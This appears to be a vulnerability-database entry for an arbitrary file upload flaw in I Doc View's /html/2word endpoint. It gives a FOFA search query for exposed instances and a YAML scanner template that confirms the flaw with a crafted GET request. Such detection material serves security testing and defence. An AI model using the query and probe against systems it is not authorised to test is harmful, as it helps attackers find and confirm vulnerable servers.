idocview-2word-fileupload: I Doc View /html/2word 任意文件上传漏洞

2025-08-01 idocview-2word-fileupload PoC Public

Description

fofa: title=="在线文档预览 - I Doc View"

PoC

id: idocview-2word-fileupload

info:
  name: I Doc View /html/2word 任意文件上传漏洞
  author: Wen
  severity: high
  verified: true
  description: |-
    fofa: title=="在线文档预览 - I Doc View"
  reference:
    - https://mp.weixin.qq.com/s/i7IHgq4fn795NghY-aYg5A
  tags: idocview,fileupload
  created: 2023/12/27

set:
  filename: randomLowercase(6)
rules:
  r0:
    request:
      method: GET
      path: /html/2word?url={{filename}}
    expression: response.status == 200 && response.headers["content-disposition"].icontains(md5(filename))
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities